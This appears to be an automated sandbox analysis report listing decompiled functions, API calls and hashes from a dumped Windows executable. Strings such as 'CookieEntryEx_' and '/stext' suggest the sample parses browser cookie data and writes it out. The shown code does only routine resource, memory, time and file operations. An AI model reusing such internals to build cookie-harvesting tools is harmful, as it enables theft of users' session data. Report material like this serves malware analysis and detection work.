Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: #A$%I64d$@#A
API String ID: 3988819677-2754857024
Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9FC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x412b10; // 0x10350e5a
								 *0x412b10 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040da09
0x0040da0f
0x0040da13
0x0040da20
0x0040da24
0x0040da2a
0x0040da32
0x0040da35
0x0040da3d
0x0040da41
0x0040da44
0x0040da47
0x0040da49
0x0040da49
0x0040da4d
0x0040da50
0x0040da60
0x0040da62
0x0040da66
0x0040da66
0x0040da6a
0x0040da6b
0x0040da74
0x0040da74
0x0040da3d
0x0040da32
0x0040da79
0x0040da7f

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
LockResource.KERNEL32(00000000), ref: 0040DA35

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040562D, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x40655f
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x0040562d
0x0040562e
0x00405632
0x0040567d
0x00405634
0x00405635
0x00405637
0x00405637
0x0040563b
0x0040563d
0x0040563f
0x00405649
0x00405651
0x00405653
0x00405657
0x00405661
0x00405666
0x0040566a
0x0040566f
0x00405679
0x00405679

APIs

malloc.MSVCRT ref: 00405649
memcpy.MSVCRT ref: 00405661
free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,75144E00,?,00000000), ref: 0040566A

Strings

_e@, xrefs: 00405637

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: _e@
API String ID: 3056473165-4143410925
Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004061CD, Relevance: 6.0, APIs: 4, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}

0x004061d7
0x004061e9
0x004061f9
0x00406201
0x00406202
0x0040621b
0x00406204
0x00406208
0x00406212
0x00406212
0x004061d9
0x004061d9
0x004061dc
0x004061e3
0x004061e3

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E490, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0x2080048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0x8c70a0
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0x8c78b0
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
				}
				_t4 =  *0x41327c; // 0x8c74a8
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}

0x0040e490
0x0040e497
0x0040e499
0x0040e49a
0x0040e49f
0x0040e4a0
0x0040e4a7
0x0040e4a9
0x0040e4aa
0x0040e4af
0x0040e4b0
0x0040e4b7
0x0040e4b9
0x0040e4ba
0x0040e4bf
0x0040e4c0
0x0040e4c7
0x0040e4c9
0x0040e4ca
0x00000000
0x0040e4cf
0x0040e4d0

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040E49A
??3@YAXPAX@Z.MSVCRT ref: 0040E4AA
??3@YAXPAX@Z.MSVCRT ref: 0040E4BA
??3@YAXPAX@Z.MSVCRT ref: 0040E4CA

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
Opcode Fuzzy Hash: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040BD40(void* __eax, void* __edx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t34;
				signed int _t43;
				intOrPtr _t54;
				intOrPtr* _t55;
				void* _t60;
				void* _t61;
				signed int _t65;
				intOrPtr _t66;
				void* _t71;

				_t60 = __edx;
				_t54 = 0;
				_t61 = __eax;
				_v4 = 0;
				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
				 *((intOrPtr*)(_t61 + 0x208)) = 0;
				_t71 = 0;
				_v16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
					L18:
					return _v4;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
						_t65 = 0x40f454;
					} else {
						_t33 = E00406306(_t33, _t54);
						_t65 = _t33;
					}
					_push(_t65);
					_push(L"/stext");
					L0040E03E();
					_pop(_t57);
					if(_t33 != 0) {
						_t34 = E0040BCAA(_t33, _t65);
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L8;
						}
						goto L7;
					} else {
						_t34 = _t33 + 1;
						L7:
						_v8 = _t34;
						_t10 = _t54 + 1; // 0x2
						_t71 = _t10;
					}
					L8:
					_t54 = _t54 + 1;
				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
				_t66 = _v8;
				if(_t66 > 0) {
					E0040B147(_t61, _t57, 0); // executed
					E0040A4C2(_t61);
					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
						_t43 = 0x40f454;
					} else {
						_t57 = _t71;
						_t43 = E00406306(_t42, _t71);
					}
					_t79 = _t66 - 8;
					if(_t66 != 8) {
						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
					} else {
						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
					}
					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
					_v4 = 1;
					if(_t55 != 0) {
						 *_t55 = 0x40f648;
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
						E00403F55(_t55 + 0xbf0);
						E0040623E(_t55 + 0xbd0);
						E0040623E(_t55 + 0xbac);
						E00406355(_t55 + 0xb98);
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
						E00403FBE(_t55 + 0x350);
						E004076F4(_t55);
						_push(_t55);
						L0040E032();
					}
				}
				goto L18;
			}

0x0040bd40
0x0040bd47
0x0040bd49
0x0040bd53
0x0040bd57
0x0040bd62
0x0040bd6b
0x0040bd70
0x0040bd74
0x0040be8c
0x0040be97
0x00000000
0x00000000
0x00000000
0x0040bd7a
0x0040bd7a
0x0040bd7a
0x0040bd83
0x0040bd90
0x0040bd85
0x0040bd87
0x0040bd8c
0x0040bd8c
0x0040bd95
0x0040bd96
0x0040bd9b
0x0040bda3
0x0040bda4
0x0040bda9
0x0040bdae
0x0040bdb0
0x00000000
0x00000000
0x00000000
0x0040bda6
0x0040bda6
0x0040bdb2
0x0040bdb2
0x0040bdb6
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040bdc2
0x0040bdc4
0x0040bdc8
0x0040bdce
0x0040bdd8
0x0040bddf
0x0040bde4
0x0040bded
0x0040bdf8
0x0040bdef
0x0040bdef
0x0040bdf1
0x0040bdf1
0x0040bdfd
0x0040be00
0x0040be16
0x0040be02
0x0040be07
0x0040be07
0x0040be1b
0x0040be23
0x0040be2b
0x0040be33
0x0040be39
0x0040be43
0x0040be4e
0x0040be59
0x0040be64
0x0040be6f
0x0040be79
0x0040be80
0x0040be85
0x0040be86
0x0040be8b
0x0040be2b
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040BD9B
??3@YAXPAX@Z.MSVCRT ref: 0040BE86

Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0

Strings

/stext, xrefs: 0040BD96

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??3@
String ID: /stext
API String ID: 3682227554-3817206916
Opcode ID: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
Opcode Fuzzy Hash: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403EAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403EAC(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t29 = _t28 & 0xfffffff8;
				_push(__ecx);
				_push(__ecx);
				_t9 = E004039F6(__edi); // executed
				_t24 = 0;
				_v8 = _t9;
				if(_t9 != 0) {
					L7:
					return _v8;
				}
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
					L5:
					E0040405E(_t22 + 4);
					_t27 = _t22 + 0x430;
					if( *_t27 != 0) {
						DeleteFileW(_t27); // executed
						 *_t27 =  *_t27 & 0x00000000;
					}
					goto L7;
				} else {
					goto L2;
				}
				do {
					L2:
					_t14 = E00403F2B(_t24, _t22 + 0x420);
					_push(0xe);
					_t18 = _t14;
					_push(L"CookieEntryEx_");
					_push(_t14);
					L0040E044();
					_t29 = _t29 + 0xc;
					if(_t14 == 0) {
						E00403BAF(_t21, _t22, _t18); // executed
					}
					_t24 = _t24 + 1;
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
				goto L5;
			}

0x00403eac
0x00403eac
0x00403eaf
0x00403eb2
0x00403eb3
0x00403eb8
0x00403ebd
0x00403ec1
0x00403ec5
0x00403f21
0x00403f2a
0x00403f2a
0x00403ecd
0x00403f02
0x00403f05
0x00403f0a
0x00403f14
0x00403f17
0x00403f1d
0x00403f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ecf
0x00403ecf
0x00403ed7
0x00403edc
0x00403ede
0x00403ee0
0x00403ee5
0x00403ee6
0x00403eeb
0x00403ef0
0x00403ef4
0x00403ef4
0x00403ef9
0x00403efa
0x00000000

APIs

Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77

_wcsnicmp.MSVCRT ref: 00403EE6

Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA

DeleteFileW.KERNELBASE(?), ref: 00403F17

Strings

CookieEntryEx_, xrefs: 00403EE0

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcslen$DeleteFile_wcsnicmp
String ID: CookieEntryEx_
API String ID: 3258848388-47494461
Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD

Uniqueness

Uniqueness Score: -1.00%

Function 00406785, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406785() {
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x413288 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41328c = 0x100;
					 *0x413290 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
					L0040E038(); // executed
					 *0x413270 = _t27;
					_t28 =  *0x41328c; // 0x100
					_t52 = 4;
					_t29 = _t28 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040E038();
					 *0x413278 = _t29;
					_t30 =  *0x41328c; // 0x100
					_t54 = 4;
					_t31 = _t30 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040E038();
					 *0x41327c = _t31;
					_t32 =  *0x413290; // 0x1000
					_t56 = 2;
					_t33 = _t32 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
					L0040E038(); // executed
					 *0x413274 = _t33;
					return _t33;
				}
				return _t25;
			}

0x00406785
0x0040678c
0x0040679b
0x0040679c
0x004067a1
0x004067a6
0x004067b0
0x004067be
0x004067bf
0x004067c4
0x004067c9
0x004067d2
0x004067d3
0x004067dc
0x004067dd
0x004067e2
0x004067e7
0x004067f0
0x004067f1
0x004067fa
0x004067fb
0x00406800
0x00406805
0x0040680e
0x0040680f
0x00406818
0x00406819
0x00406821
0x00000000
0x00406821
0x00406826

APIs

??2@YAPAXI@Z.MSVCRT ref: 004067BF
??2@YAPAXI@Z.MSVCRT ref: 004067DD
??2@YAPAXI@Z.MSVCRT ref: 004067FB
??2@YAPAXI@Z.MSVCRT ref: 00406819

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08

Uniqueness

Uniqueness Score: -1.00%

Function 0040567E, Relevance: 4.5, APIs: 3, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				short _v524;
				WCHAR* _t12;

				_t12 = __edi;
				if(GetTempPathW(0x104,  &_v524) == 0) {
					GetWindowsDirectoryW( &_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;
				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
				return _t12;
			}

0x0040567e
0x0040569d
0x004056a7
0x004056a7
0x004056ad
0x004056be
0x004056c8

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00405695
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}

0x00404077
0x00404081
0x00404084
0x0040408c
0x00404099
0x004040a2

APIs

SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Strings

F@@, xrefs: 0040408A, 00404097

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerRead
String ID: F@@
API String ID: 3154509469-234039029
Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004096FE, Relevance: 3.1, APIs: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t34;
				void* _t42;
				void* _t44;
				void* _t51;
				signed int _t54;
				intOrPtr* _t58;
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed
					}
					E004052A6();
				}
				return _v8;
			}

0x004096fe
0x004096fe
0x00409701
0x00409702
0x00409709
0x0040970b
0x0040970d
0x00409710
0x00409717
0x0040971c
0x00409722
0x0040972f
0x00409724
0x00409725
0x0040972a
0x0040972a
0x00409735
0x0040973a
0x004097e0
0x004097e2
0x00409740
0x00409743
0x00409748
0x00409753
0x00409755
0x0040974a
0x0040974a
0x0040974c
0x0040974c
0x0040975a
0x0040975b
0x00409760
0x00409763
0x0040976a
0x00409775
0x0040977d
0x0040977f
0x00409780
0x00409787
0x0040978a
0x00409792
0x00000000
0x00409794
0x00409794
0x00409799
0x0040979e
0x004097a7
0x004097b1
0x004097b7
0x004097b9
0x00000000
0x00000000
0x00000000
0x004097a7
0x00000000
0x004097a9
0x004097a9
0x004097aa
0x004097af
0x004097bf
0x004097c3
0x004097cf
0x004097d2
0x004097d2
0x004097d8
0x004097d8
0x004097ef

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 0040972F
FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004097D2

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

